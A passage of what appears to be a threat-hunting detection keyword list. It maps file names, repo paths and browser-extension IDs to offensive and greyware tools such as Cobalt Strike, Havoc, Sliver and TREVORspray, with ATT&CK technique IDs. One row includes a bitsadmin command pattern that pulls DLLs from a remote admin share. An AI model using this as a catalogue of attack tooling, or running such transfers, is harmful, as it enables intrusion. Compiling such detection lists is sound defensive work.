T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bhttp_x64.dll*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*bibjcjfmgapbfoljiojpipaooddpkpai*,greyware_tool_keyword,VPN-free.pro,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bigb0sss/goPassGen*,offensive_tool_keyword,goPassGen,Easily-guessable Password Generator for Password Spray Attack,T1110 - T1110.003,TA0006 ,N/A,N/A,Exploitation tools,https://github.com/bigb0sss/goPassGen,1,1,N/A,8,1,20,3,2020-06-04T23:13:44Z,2020-06-04T22:33:37Z -*bihhflimonbpcfagfadcnbbdngpopnjb*,greyware_tool_keyword,DEEPRISM VPN,External VPN usage within coporate 
network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bihmplhobchoageeokmgbdihknkjbknd*,greyware_tool_keyword,Touch VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bin/*/PS2EXE/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*bin/addusertogroup.x64*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*bin/bof_c.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF Files with Nim!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 
- T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/byt3bl33d3r/BOF-Nim,1,1,N/A,10,10,83,12,2022-07-10T22:12:10Z,2021-01-12T18:58:23Z -*bin/bof_nim.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF Files with Nim!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/byt3bl33d3r/BOF-Nim,1,1,N/A,10,10,83,12,2022-07-10T22:12:10Z,2021-01-12T18:58:23Z -*bin/dll/merlin.c*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - 
T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*bin/icmpsh/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*bin/ldd2pretty*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*bin/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*bin/localrelay*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*bin/masscan*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*bin/setoolkit*,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. 
SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec,T1566 - T1598,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/trustedsec/social-engineer-toolkit,1,1,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -*bin/setuserpass.x64*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*bin/SillyRAT/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*bin/striker*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*bin/void.zip*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Bin\bin32\zlibwapi.dll*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - 
T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*Bin\bin64\zlibwapi.dll*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*bin\SillyRAT*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*bin\void.zip*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*binderlabs/DirCreate2System*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*binwalk -e image.png*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*binwalk*,greyware_tool_keyword,binwalk,Binwalk is a fast. easy to use tool for analyzing. reverse engineering. 
and extracting firmware images.,T1059.007 - T1060 - T1057 - T1142 - T1102.003,TA0002 - TA0005 - TA0009,N/A,N/A,Exploitation Tools,https://github.com/ReFirmLabs/binwalk,1,0,greyware tool - risks of False positive !,N/A,10,9640,1442,2023-08-23T23:11:31Z,2013-11-15T20:45:40Z -*BishopFox/sliver*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*bitb_server/phishing.ini*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,1,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*bitcoin2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Bitmap-Elevate*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16135.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*bitquark_top100k_sublist.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*bits_ntlm_token_impersonation.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bitsadmin /transfer debjob /download /priority normal \*\C$\Windows\*.dll,greyware_tool_keyword,bitsadmin,bitsadmin suspicious transfer,T1105 - T1041 - T1048,TA0002 - TA0003 - TA0010,N/A,N/A,Exploitation Tools,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*bitsadmin/nopowershell*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*BitsadminStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bitshares2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*bitwarden2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Biu-framework*,offensive_tool_keyword,Biu-framework,Biu-framework Security Scan Framework For Enterprise Intranet Based Services,T1590 - T1591 - T1592 - T1593 - T1595 - T1596 - T1599,TA0011,N/A,N/A,Frameworks,https://awesomeopensource.com/project/0xbug/Biu-framework,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BKDR_JSPSHELL.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*bkerberos_ccache_use*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bkerberos_ticket_purge*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bkerberos_ticket_use*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bkeylogger*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bkkgdjpomdnfemhhkalfkogckjdkcjkg*,greyware_tool_keyword,VPNMatic,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bks2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*blackarrowsec/mssqlproxy*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*blackarrowsec/pivotnacci*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,1,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*blackhat-arsenal-tools*,offensive_tool_keyword,Github Username,This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readibility. 
the tools are classified by category and not by session.,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/toolswatch/blackhat-arsenal-tools,1,0,N/A,N/A,10,3545,1140,2023-08-14T03:46:11Z,2017-07-21T08:03:44Z -*blacklanternsecurity/MANSPIDER*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,1,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*blacklanternsecurity/trevorproxy*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*blacklanternsecurity/TREVORspray*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*Blackout.exe *,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*ble_recon.go*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation 
